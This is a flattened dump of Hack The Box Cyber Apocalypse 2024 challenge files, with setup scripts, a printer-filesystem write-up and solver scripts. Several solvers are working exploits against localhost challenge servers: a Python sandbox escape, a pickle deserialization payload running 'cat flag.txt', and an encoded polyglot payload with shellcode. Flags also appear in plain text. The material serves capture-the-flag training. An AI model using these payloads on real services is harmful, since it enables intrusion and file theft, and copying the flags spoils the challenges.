/hw/BunnyPass [Very Easy]/assets/queues2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/BunnyPass [Very Easy]/assets/queues2.png -------------------------------------------------------------------------------- /hw/BunnyPass [Very Easy]/assets/rabbitmq.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/BunnyPass [Very Easy]/assets/rabbitmq.png -------------------------------------------------------------------------------- /hw/BunnyPass [Very Easy]/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Secure entrypoint 4 | chmod 600 /entrypoint.sh 5 | 6 | # Wait for RabbitMQ to start 7 | bash -c 'while [[ "$(curl -s -o /dev/null -w ''%{http_code}'' http://guest:guest@127.0.0.1:15672/api/aliveness-test/%2F)" != "200" ]]; do echo "RabbitMQ not up yet" && sleep 1; done' 8 | 9 | # Setup admin user 10 | rabbitmqctl add_user admin admin 11 | rabbitmqctl set_user_tags admin administrator 12 | rabbitmqctl set_permissions -p / admin ".*" ".*" ".*" 13 | 14 | # Declare message queues 15 | rabbitmqadmin declare queue --vhost=/ name=factory_idle durable=true 16 | rabbitmqadmin declare queue --vhost=/ name=automation durable=true 17 | rabbitmqadmin declare queue --vhost=/ name=batch_process durable=true 18 | rabbitmqadmin declare queue --vhost=/ name=alerts durable=true 19 | rabbitmqadmin declare queue --vhost=/ name=quality_control durable=true 20 | 21 | # Populate data 22 | echo 102 | rabbitmqadmin publish exchange=amq.default routing_key=factory_idle 23 | echo process_done | rabbitmqadmin publish exchange=amq.default routing_key=automation 24 | echo process_idle | rabbitmqadmin publish exchange=amq.default routing_key=automation 25 | echo process_halt | rabbitmqadmin publish exchange=amq.default routing_key=automation 26 | echo labelled | rabbitmqadmin publish exchange=amq.default routing_key=batch_process 27 | echo processed | rabbitmqadmin publish exchange=amq.default routing_key=batch_process 28 | echo pending | rabbitmqadmin publish exchange=amq.default routing_key=batch_process 29 | echo 00 | rabbitmqadmin publish exchange=amq.default routing_key=factory_idle 30 | echo "device-halted|err|storage_room_132" | rabbitmqadmin publish exchange=amq.default routing_key=factory_idle 31 | echo "device-failed-to-respond|err|storage_room_132" | rabbitmqadmin publish exchange=amq.default routing_key=factory_idle 32 | echo "device-time-out|err|storage_room_132" | rabbitmqadmin publish exchange=amq.default routing_key=factory_idle 33 | 34 | # Add more queues and logs 35 | rabbitmqadmin declare queue --vhost=/ name=production_logs durable=true 36 | rabbitmqadmin declare queue --vhost=/ name=temperature_logs durable=true 37 | rabbitmqadmin declare queue --vhost=/ name=maintenance_logs durable=true 38 | 39 | echo "production_started|info|line_1" | rabbitmqadmin publish exchange=amq.default routing_key=production_logs 40 | echo "product_quality_issue|warning|line_1" | rabbitmqadmin publish exchange=amq.default routing_key=quality_control 41 | echo "maintenance_required|info|line_1" | rabbitmqadmin publish exchange=amq.default routing_key=maintenance_logs 42 | 43 | echo "HTB{th3_hunt3d_b3c0m3s_th3_hunt3r}" | rabbitmqadmin publish exchange=amq.default routing_key=factory_idle -------------------------------------------------------------------------------- /hw/Flash-ing Logs [Hard]/assets/W25Q128.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Flash-ing Logs [Hard]/assets/W25Q128.png -------------------------------------------------------------------------------- /hw/Flash-ing Logs [Hard]/assets/datahsheet_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Flash-ing Logs [Hard]/assets/datahsheet_2.png -------------------------------------------------------------------------------- /hw/Flash-ing Logs [Hard]/assets/datasheet_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Flash-ing Logs [Hard]/assets/datasheet_1.png -------------------------------------------------------------------------------- /hw/Flash-ing Logs [Hard]/assets/datasheet_3_instructions.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Flash-ing Logs [Hard]/assets/datasheet_3_instructions.png -------------------------------------------------------------------------------- /hw/Flash-ing Logs [Hard]/assets/datasheet_3_instructions_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Flash-ing Logs [Hard]/assets/datasheet_3_instructions_2.png -------------------------------------------------------------------------------- /hw/Flash-ing Logs [Hard]/assets/flow_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Flash-ing Logs [Hard]/assets/flow_1.png -------------------------------------------------------------------------------- /hw/Flash-ing Logs [Hard]/assets/instruction_erase_sector.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Flash-ing Logs [Hard]/assets/instruction_erase_sector.png -------------------------------------------------------------------------------- /hw/Flash-ing Logs [Hard]/assets/instruction_page_program.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Flash-ing Logs [Hard]/assets/instruction_page_program.png -------------------------------------------------------------------------------- /hw/Flash-ing Logs [Hard]/assets/instruction_read.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Flash-ing Logs [Hard]/assets/instruction_read.png -------------------------------------------------------------------------------- /hw/Flash-ing Logs [Hard]/assets/instruction_read_sec_reg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Flash-ing Logs [Hard]/assets/instruction_read_sec_reg.png -------------------------------------------------------------------------------- /hw/Flash-ing Logs [Hard]/assets/instruction_write_enable.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Flash-ing Logs [Hard]/assets/instruction_write_enable.png -------------------------------------------------------------------------------- /hw/Flash-ing Logs [Hard]/assets/winbond.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Flash-ing Logs [Hard]/assets/winbond.png -------------------------------------------------------------------------------- /hw/Maze [Very Easy]/Makefile: -------------------------------------------------------------------------------- 1 | default: 2 | ifdef name 3 | @cd challenge; \ 4 | mkdir -p ../release/hardware_$(name); \ 5 | cp -r ./fs ../release/hardware_$(name); 6 | 7 | @cd release; \ 8 | zip -9 -r ./hardware_$(name).zip ./hardware_$(name); \ 9 | unzip -l ./hardware_$(name).zip; 10 | 11 | @echo [+] Challenge was built successfully. 12 | else 13 | @echo [-] Please define the challenge name. For example, \"make name=cool_chall_name\" 14 | endif 15 | 16 | test: clean default 17 | 18 | clean: 19 | @rm -rf release/* 20 | @echo [+] Challenge release deleted successfully. 21 | -------------------------------------------------------------------------------- /hw/Maze [Very Easy]/README.md: -------------------------------------------------------------------------------- 1 | ![img](../../../../../assets/banner.png) 2 | 3 | Maze 4 | 5 | 28th 2022 / Document No. D22.102.16 6 | 7 | Prepared By: WizardAlfredo 8 | 9 | Challenge Author(s): WizardAlfredo 10 | 11 | Difficulty: Very Easy 12 | 13 | Classification: Official 14 | 15 | # Synopsis 16 | 17 | - Read a PDF from a printer's filesystem 18 | 19 | ## Description 20 | 21 | - In a world divided by factions, "AM", a young hacker from the Phreaks, found himself falling in love with "echo," a talented security researcher from the Revivalists. Despite the different backgrounds, you share a common goal: dismantling The Fray. You still remember the first interaction where you both independently hacked into The Fray's systems and stumbled upon the same vulnerability in a printer. Leaving behind your hacker handles, "AM" and "echo," you connected through IRC channels and began plotting your rebellion together. Now, it's finally time to analyze the printer's filesystem. What can you find? 22 | 23 | ## Skills Required 24 | 25 | - Basic folder navigation. 26 | 27 | ## Skills Learned 28 | 29 | - Learn the file system structure of a printer. 30 | 31 | # Enumeration 32 | 33 | ## Analyzing the files 34 | 35 | In this challenge we only get a downloadable. If we do a simple `tree` command 36 | we will get the following folders and a file called Factory.pdf. 37 | 38 | ```bash 39 | fs 40 | ├── PJL 41 | ├── PostScript 42 | ├── saveDevice 43 | │   └── SavedJobs 44 | │   ├── InProgress 45 | │   │   └── Factory.pdf 46 | │   └── KeepJob 47 | └── webServer 48 | ├── default 49 | │   └── csconfig 50 | ├── home 51 | │   ├── device.html 52 | │   └── hostmanifest 53 | ├── lib 54 | │   ├── keys 55 | │   └── security 56 | ├── objects 57 | └── permanent 58 | ``` 59 | 60 | Let's delve into the file structure of a HP laserjet printer's filesystem. There are four main directories: `PJL`, `PostScript`, `saveDevice`, and `webServer`. 61 | 62 | - `PJL` and `PostScript`: These directories typically contain files related to Printer Job Language (PJL) and PostScript, respectively. PostScript is a page description language commonly used in printing and desktop publishing. 63 | 64 | - `webServer`: This folder holds files associated with the printer's web server functionality. 65 | 66 | - `saveDevice`: This directory is our primary focus, as it manages print jobs on the printer. Specifically: 67 | - `SavedJobs`: This subdirectory has two further subdirectories: 68 | - `InProgress`: Contains jobs currently being processed or printed. 69 | - `KeepJob`: Contains completed jobs retained for future reference. 70 | 71 | # Solution: 72 | 73 | ## Getting the Flag 74 | 75 | Upon inspection of the `InProgress` directory, we find a PDF named Factory.pdf. Let's open it and retrieve the flag. 76 | 77 | ![image-20240314210808496](./assets/image-20240314210808496.png) 78 | -------------------------------------------------------------------------------- /hw/Maze [Very Easy]/assets/image-20240314210808496.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Maze [Very Easy]/assets/image-20240314210808496.png -------------------------------------------------------------------------------- /hw/Rids [Easy]/assets/W25Q128.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Rids [Easy]/assets/W25Q128.png -------------------------------------------------------------------------------- /hw/Rids [Easy]/assets/datahsheet_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Rids [Easy]/assets/datahsheet_2.png -------------------------------------------------------------------------------- /hw/Rids [Easy]/assets/datasheet_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Rids [Easy]/assets/datasheet_1.png -------------------------------------------------------------------------------- /hw/Rids [Easy]/assets/instruction_read.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Rids [Easy]/assets/instruction_read.png -------------------------------------------------------------------------------- /hw/Rids [Easy]/assets/read.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Rids [Easy]/assets/read.png -------------------------------------------------------------------------------- /hw/Rids [Easy]/assets/winbond.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Rids [Easy]/assets/winbond.png -------------------------------------------------------------------------------- /hw/Rids [Easy]/htb/solver.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import json 3 | import binascii 4 | import struct 5 | import copy 6 | from pwn import args 7 | 8 | if args.REMOTE: 9 | IP, PORT = args.HOST.split(":") 10 | else: 11 | IP = '127.0.0.1' 12 | PORT = 1337 13 | 14 | 15 | def exchange(hex_list, value=0): 16 | 17 | # Configure according to your setup 18 | cs = 0 # /CS on A*BUS3 (range: A*BUS3 to A*BUS7) 19 | 20 | usb_device_url = 'ftdi://ftdi:2232h/1' 21 | 22 | # Convert hex list to strings and prepare the command data 23 | command_data = { 24 | "tool": "pyftdi", 25 | "cs_pin": cs, 26 | "url": usb_device_url, 27 | "data_out": 28 | [hex(x) for x in hex_list], # Convert hex numbers to hex strings 29 | "readlen": value 30 | } 31 | 32 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: 33 | s.connect((IP, int(PORT))) 34 | 35 | # Serialize data to JSON and send 36 | s.sendall(json.dumps(command_data).encode('utf-8')) 37 | 38 | # Receive and process response 39 | data = b'' 40 | while True: 41 | data += s.recv(1024) 42 | if data.endswith(b']'): 43 | break 44 | 45 | response = json.loads(data.decode('utf-8')) 46 | #print(f"Received: {response}") 47 | return response 48 | 49 | 50 | def format_print(log_entry): 51 | hex_list = [f'{num:02x}' for num in log_entry] 52 | formatted_hex_string = ' '.join(hex_list) 53 | print(formatted_hex_string.upper()) 54 | 55 | 56 | def append_crc(data): 57 | # Calculate CRC32 of the data and return it as unsigned int 58 | crc = binascii.crc32(data) & 0xffffffff 59 | # Append CRC32 to the data 60 | return data + struct.pack('I', crc) 61 | 62 | 63 | FLAG = exchange([0x03, 0x00, 0x00, 0x00], 4096) 64 | 65 | 66 | # Convert the list of characters back to their ASCII values 67 | ascii_values = [chr(char) for char in FLAG if char < 255] 68 | 69 | print(''.join(ascii_values)) 70 | 71 | 72 | -------------------------------------------------------------------------------- /hw/The PROM [Medium]/assets/image-20240313172648964.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/The PROM [Medium]/assets/image-20240313172648964.png -------------------------------------------------------------------------------- /hw/The PROM [Medium]/assets/image-20240313172820264.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/The PROM [Medium]/assets/image-20240313172820264.png -------------------------------------------------------------------------------- /hw/The PROM [Medium]/assets/image-20240313172942389.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/The PROM [Medium]/assets/image-20240313172942389.png -------------------------------------------------------------------------------- /hw/The PROM [Medium]/assets/image-20240313173144008.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/The PROM [Medium]/assets/image-20240313173144008.png -------------------------------------------------------------------------------- /hw/The PROM [Medium]/htb/solver.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | def byte_to_volts(byte): 5 | return [((byte >> i) & 1) * 5 for i in range(10, -1, -1)] 6 | 7 | 8 | def bits_to_byte(bits): 9 | return int(''.join(map(str, bits)), 2) 10 | 11 | 12 | def to_ascii(data): 13 | return data.decode().strip() 14 | 15 | 16 | def read_memory(address, secret=False): 17 | r.sendlineafter(b"> ", b"set_ce_pin(0)") 18 | r.sendlineafter(b"> ", b"set_oe_pin(0)") 19 | r.sendlineafter(b"> ", b"set_we_pin(5)") 20 | if secret: 21 | bits = byte_to_volts(address) 22 | bits[1] = 12 23 | address_pins = bytes(str(bits), "Latin") 24 | else: 25 | address_pins = bytes(str(byte_to_volts(address)), "Latin") 26 | r.sendlineafter(b"> ", b"set_address_pins(" + address_pins + b")") 27 | r.sendlineafter(b"> ", b"read_byte()") 28 | return to_ascii(r.recvline()) 29 | 30 | 31 | def get_flag(): 32 | flag = "" 33 | for address in range(0x7e0, 0x7ff + 1): 34 | data = read_memory(address, secret=True) 35 | byte = data[5:-17] 36 | flag += chr(eval(byte)) 37 | return flag 38 | 39 | 40 | def pwn(): 41 | r.recvuntil(b"> help") 42 | flag = get_flag() 43 | print(flag) 44 | 45 | 46 | if __name__ == "__main__": 47 | if args.REMOTE: 48 | ip, port = args.HOST.split(":") 49 | r = remote(ip, int(port)) 50 | else: 51 | r = process("python3 ../challenge/server.py", shell=True) 52 | 53 | pwn() 54 | -------------------------------------------------------------------------------- /misc/[Easy] Cubicle Riddle/htb/solver.py: -------------------------------------------------------------------------------- 1 | import telnetlib 2 | import re 3 | 4 | _payload = b'|\x00D\x00]\x12}\x03|\x03|\x01k\x00\x00\x00\x00\x00r\x02|\x03}\x01|\x03|\x02k\x04\x00\x00\x00\x00r\x02|\x03}\x02\x8c\x13' 5 | _payload_string = ','.join(str(b) for b in _payload) 6 | HOST = "127.0.0.1" 7 | PORT = 1337 8 | 9 | tn = telnetlib.Telnet(HOST, PORT) 10 | 11 | print(" > Connected succesfully to server...") 12 | tn.read_until(b"\n(Choose wisely) > ") 13 | print(" > Read garbage...") 14 | tn.write(b'1') 15 | tn.read_until(b"\n(Answer wisely) > ") 16 | print(" > Read some more garbage...") 17 | tn.write(_payload_string.encode()) 18 | last_message = str(tn.read_all()) 19 | 20 | 21 | pattern = re.compile("HTB\{.*?\}") 22 | match = re.search(pattern, last_message) 23 | print(f" > Found the flag: {match.group()}") -------------------------------------------------------------------------------- /misc/[Easy] Unbreakable/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/misc/[Easy] Unbreakable/assets/banner.png -------------------------------------------------------------------------------- /misc/[Easy] Unbreakable/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/misc/[Easy] Unbreakable/assets/htb.png -------------------------------------------------------------------------------- /misc/[Easy] Unbreakable/htb/solver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | import warnings 4 | import os 5 | warnings.filterwarnings('ignore') 6 | context.log_level = 'critical' 7 | 8 | fname = './main.py' 9 | 10 | LOCAL = False 11 | 12 | os.system('clear') 13 | 14 | if LOCAL: 15 | print('Running solver locally..\n') 16 | r = process(['python3', fname]) 17 | else: 18 | IP = str(sys.argv[1]) if len(sys.argv) >= 2 else '0.0.0.0' 19 | PORT = int(sys.argv[2]) if len(sys.argv) >= 3 else 1337 20 | r = remote(IP, PORT) 21 | print(f'Running solver remotely at {IP} {PORT}\n') 22 | 23 | r.sendline("print(open('flag.txt','r').read())#") 24 | print(f'Flag --> {r.recvline_contains(b"HTB").strip().decode()[2:]}\n') 25 | -------------------------------------------------------------------------------- /misc/[Easy] Were Pickle Phreaks/htb/sol.py: -------------------------------------------------------------------------------- 1 | from base64 import b64encode 2 | from pickora import Compiler 3 | from pwn import * 4 | 5 | def send_payload(payload): 6 | payload = b64encode(compiler.compile(payload)) 7 | io.recvuntil(b'> ') 8 | io.sendline(b'2') 9 | io.recvuntil(b': ') 10 | io.sendline(payload) 11 | 12 | def get_flag(): 13 | io.recvuntil(b'> ') 14 | io.sendline(b'1') 15 | io.recvuntil(b'HTB{') 16 | flag = io.recvuntil(b'}') 17 | return b'HTB{' + flag 18 | 19 | def pwn(): 20 | send_payload(b"GLOBAL('app', 'random._os.system')('cat flag.txt')") 21 | flag = get_flag() 22 | print(flag) 23 | 24 | if __name__ == '__main__': 25 | ip = '127.0.0.1' 26 | port = 1337 27 | io = remote(ip, port) 28 | #io = process(['python', 'app.py']) 29 | compiler = Compiler() 30 | pwn() 31 | -------------------------------------------------------------------------------- /misc/[Hard] MultiDigilingual/htb/sol.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | def send_payload(): 4 | io.recvuntil(b': ') 5 | io.sendline(payload) 6 | 7 | def get_flag(): 8 | io.recvuntil(b'HTB{') 9 | flag = io.recvuntil(b'}') 10 | return b'HTB{' + flag 11 | 12 | def pwn(): 13 | send_payload() 14 | flag = get_flag() 15 | print(flag) 16 | 17 | if __name__ == '__main__': 18 | ip = '127.0.0.1' 19 | port = 1337 20 | io = remote(ip, port) 21 | #io = process(['python', 'server.py']) 22 | payload = b'I2lmIDAKIzw/cGhwIHN5c3RlbSgnY2F0IGZsYWcudHh0OycpOyBfX2hhbHRfY29tcGlsZXIoKTs/PgpwcmludCgoKCJiIiArICIwIiA9PSAwIGFuZCBleGVjKCJjYXQgZmxhZy50eHQiKSkgb3IgKDAgYW5kIGV4ZWMoImNhdCBmbGFnLnR4dCIpIG9yIGV2YWwoJ19faW1wb3J0X18oInN5cyIpLnN0ZG91dC53cml0ZShvcGVuKCJmbGFnLnR4dCIpLnJlYWQoKSknKSkpKTsKI2VuZGlmCl9fYXNtX18oIi5zZWN0aW9uIC50ZXh0XG4uZ2xvYmwgbWFpblxubWFpbjpcbm1vdiAkMHgwMDAwMDAwMDAwMDAwMDAwLCAlcmF4XG5wdXNoICVyYXhcbm1vdiAkMHg3NDc4NzQyZTY3NjE2YzY2LCAlcmF4XG5wdXNoICVyYXhcbm1vdiAlcnNwLCAlcmRpXG54b3IgJXJzaSwgJXJzaVxubW92ICQyLCAlcmF4XG5zeXNjYWxsXG5tb3YgJXJheCwgJXJkaVxubW92ICVyc3AsICVyc2lcbm1vdiAkMHgxMDAsICVyZHhcbnhvciAlcmF4LCAlcmF4XG5zeXNjYWxsXG5tb3YgJDEsICVyZGlcbm1vdiAlcnNwLCAlcnNpXG5tb3YgJXJheCwgJXJkeFxubW92ICQxLCAlcmF4XG5zeXNjYWxsXG54b3IgJXJkaSwgJXJkaVxubW92ICQ2MCwgJXJheFxuc3lzY2FsbFxuIik7' 23 | pwn() 24 | 25 | ''' 26 | exploit code 27 | 28 | #if 0 29 | # 30 | print((("b" + "0" == 0 and exec("cat flag.txt")) or (0 and exec("cat flag.txt") or eval('__import__("sys").stdout.write(open("flag.txt").read())')))); 31 | #endif 32 | __asm__(".section .text\n.globl main\nmain:\nmov $0x0000000000000000, %rax\npush %rax\nmov $0x7478742e67616c66, %rax\npush %rax\nmov %rsp, %rdi\nxor %rsi, %rsi\nmov $2, %rax\nsyscall\nmov %rax, %rdi\nmov %rsp, %rsi\nmov $0x100, %rdx\nxor %rax, %rax\nsyscall\nmov $1, %rdi\nmov %rsp, %rsi\nmov %rax, %rdx\nmov $1, %rax\nsyscall\nxor %rdi, %rdi\nmov $60, %rax\nsyscall\n"); 33 | ''' 34 | -------------------------------------------------------------------------------- /misc/[Hard] Path of Survival/assets/initial_view.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/misc/[Hard] Path of Survival/assets/initial_view.png -------------------------------------------------------------------------------- /misc/[Hard] Path of Survival/htb/consts_sol.py: -------------------------------------------------------------------------------- 1 | # Enum Class for Terrain Type 2 | class Terrain: 3 | PLAINS = 'P' 4 | MOUNTAIN = 'M' 5 | RIVER = 'R' 6 | SAND = 'S' 7 | CLIFF = 'C' 8 | GEYSER = 'G' 9 | EMPTY = 'E' 10 | 11 | 12 | class Direction: 13 | LEFT = 'L' 14 | RIGHT = 'R' 15 | UP = 'U' 16 | DOWN = 'D' 17 | 18 | 19 | # moving to/from a cliff or geyser is only 1 point regardless 20 | # moving to and from same terrain type is 1 point 21 | # rest are detailed here 22 | COSTS = { 23 | (Terrain.PLAINS, Terrain.MOUNTAIN): 5, 24 | (Terrain.MOUNTAIN, Terrain.PLAINS): 2, 25 | 26 | (Terrain.PLAINS, Terrain.SAND): 2, 27 | (Terrain.SAND, Terrain.PLAINS): 2, 28 | 29 | (Terrain.PLAINS, Terrain.RIVER): 5, 30 | (Terrain.RIVER, Terrain.PLAINS): 5, 31 | 32 | (Terrain.MOUNTAIN, Terrain.SAND): 5, 33 | (Terrain.SAND, Terrain.MOUNTAIN): 7, 34 | 35 | (Terrain.MOUNTAIN, Terrain.RIVER): 8, 36 | (Terrain.RIVER, Terrain.MOUNTAIN): 10, 37 | 38 | (Terrain.SAND, Terrain.RIVER): 8, 39 | (Terrain.RIVER, Terrain.SAND): 6 40 | } 41 | -------------------------------------------------------------------------------- /misc/[Hard] Path of Survival/htb/pathfinder_sol.py: -------------------------------------------------------------------------------- 1 | from math import inf 2 | 3 | 4 | class Node: 5 | def __init__(self, name): 6 | self.name = name 7 | self.edges = dict() 8 | 9 | def add_edge(self, node, cost): 10 | self.edges[node] = cost 11 | 12 | def print_edges(self): 13 | print(self.edges) 14 | 15 | def __repr__(self): 16 | return str(self.name) 17 | 18 | 19 | class Graph: 20 | def __init__(self, nodes): 21 | self.nodes = nodes 22 | 23 | def dijkstra(self, start_node): 24 | distances = {start_node: 0} 25 | nodes_from = {start_node: start_node} 26 | 27 | for n in self.nodes: 28 | if n != start_node: 29 | distances[n] = inf 30 | 31 | explored = set() 32 | nodes_to_explore = [start_node] 33 | 34 | while len(nodes_to_explore) > 0: 35 | # find shortest node and remove 36 | shortest_node, shortest_distance = nodes_to_explore[0], distances[nodes_to_explore[0]] 37 | 38 | for node, cost in distances.items(): 39 | if node in explored: 40 | continue 41 | 42 | if cost < shortest_distance: 43 | shortest_node, shortest_distance = node, cost 44 | 45 | nodes_to_explore.remove(shortest_node) 46 | 47 | for node, cost in shortest_node.edges.items(): 48 | if node not in explored: 49 | nodes_to_explore.append(node) 50 | 51 | if distances[shortest_node] + cost < distances[node]: 52 | distances[node] = distances[shortest_node] + cost 53 | nodes_from[node] = shortest_node 54 | 55 | explored.add(shortest_node) 56 | 57 | return distances, nodes_from 58 | -------------------------------------------------------------------------------- /misc/[Hard] Path of Survival/htb/solve.py: -------------------------------------------------------------------------------- 1 | from game_sol import Map 2 | 3 | from requests import Session 4 | 5 | MAP = 'http://127.0.0.1:1337/map' 6 | UPDATE = 'http://127.0.0.1:1337/update' 7 | 8 | s = Session() 9 | 10 | while True: 11 | map_data = s.post(MAP).json() 12 | m = Map(width=map_data['width'], height=map_data['height'], tiles=map_data['tiles'], player=map_data['player']) 13 | 14 | seq = m.path_seq 15 | print(seq) 16 | 17 | for i, c in enumerate(seq): 18 | r = s.post(UPDATE, json={'direction': c}) 19 | data = r.json() 20 | 21 | if i == len(seq) - 1: 22 | assert 'solved' in data 23 | assert data['solved'] 24 | 25 | if 'flag' in data: 26 | print(data['flag']) 27 | exit(0) 28 | -------------------------------------------------------------------------------- /misc/[Medium] Colored Squares/Makefile: -------------------------------------------------------------------------------- 1 | default: 2 | ifdef name 3 | @cd challenge; \ 4 | python3 source.py; \ 5 | mkdir crypto_$(name); \ 6 | cp source.py output.txt ./crypto_$(name); \ 7 | cp output.txt ../htb/; \ 8 | mv ./crypto_$(name) ../release/; 9 | 10 | @cd release; \ 11 | zip -9 -r ./crypto_$(name).zip ./crypto_$(name); \ 12 | unzip -l ./crypto_$(name).zip; 13 | 14 | @echo [+] Challenge was built successfully. 15 | else 16 | @echo [-] Please define the challenge name. For example, \"make name=cool_chall_name\" 17 | endif 18 | 19 | flag: 20 | @echo [+] Flag : $$(cd challenge; python3 -c 'import secret; print(secret.FLAG.decode())') 21 | solver: 22 | @echo [+] PoC : $$(cd htb ; python3 solver.py) 23 | @find . -name "*.sage.py" -type f -delete 24 | 25 | test: clean default flag solver 26 | 27 | clean: 28 | @rm -rf release/* 29 | @rm -rf htb/output.txt 30 | @find . -name "*.sage.py" -type f -delete 31 | @echo [+] Challenge release deleted successfully. 32 | -------------------------------------------------------------------------------- /misc/[Medium] Colored Squares/htb/solver.py: -------------------------------------------------------------------------------- 1 | from z3 import * 2 | import string 3 | 4 | flag = BitVecs('v0, v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21', 8) 5 | 6 | s = Solver() 7 | 8 | for i in range(len(flag)): 9 | s.add(flag[i] >= 48) 10 | s.add(flag[i] <= 125) 11 | 12 | s.add(flag[0] == ord('H')) 13 | s.add(flag[1] == ord('T')) 14 | s.add(flag[2] == ord('B')) 15 | s.add(flag[3] == ord('{')) 16 | s.add(flag[21] == ord('}')) 17 | 18 | s.add(flag[7] - flag[18] == flag[8] - flag[9]) # 19 | s.add(flag[6] + flag[10] == flag[16] + flag[20] + 12) # 20 | s.add(flag[8] * flag[14] == 2 * flag[18] * flag[13]) # 21 | s.add(flag[19] == flag[6]) # 22 | s.add(flag[9] + 1 == flag[17] - 1) # 23 | s.add(flag[11] == 2 * (flag[5] + 7)) # 24 | s.add(flag[5] + flag[2]/2 == flag[1]) # 25 | s.add(flag[16] - 9 == flag[13] + 4) # 26 | s.add(flag[12] == 17 * 3) # 27 | s.add(flag[4] - flag[5] + flag[12] == flag[14] + 20) # 28 | s.add(flag[12] * flag[15] == 24 * flag[14]) # 29 | s.add(flag[18] + flag[4] == 173) # 30 | s.add(flag[6] == flag[5] + 63) # 31 | s.add(flag[16] * 32 == flag[0] * flag[7]) # 32 | s.add(flag[17] - flag[15] == flag[18] + 1) # 33 | 34 | # guess that last letter is 's' 35 | s.add(flag[20] == ord('s')) 36 | 37 | if s.check() == sat: 38 | f = '' 39 | m = s.model() 40 | for v in flag: 41 | f += chr(m[v].as_long()) 42 | print(f) 43 | else: 44 | print('fail') 45 | -------------------------------------------------------------------------------- /misc/[Medium] 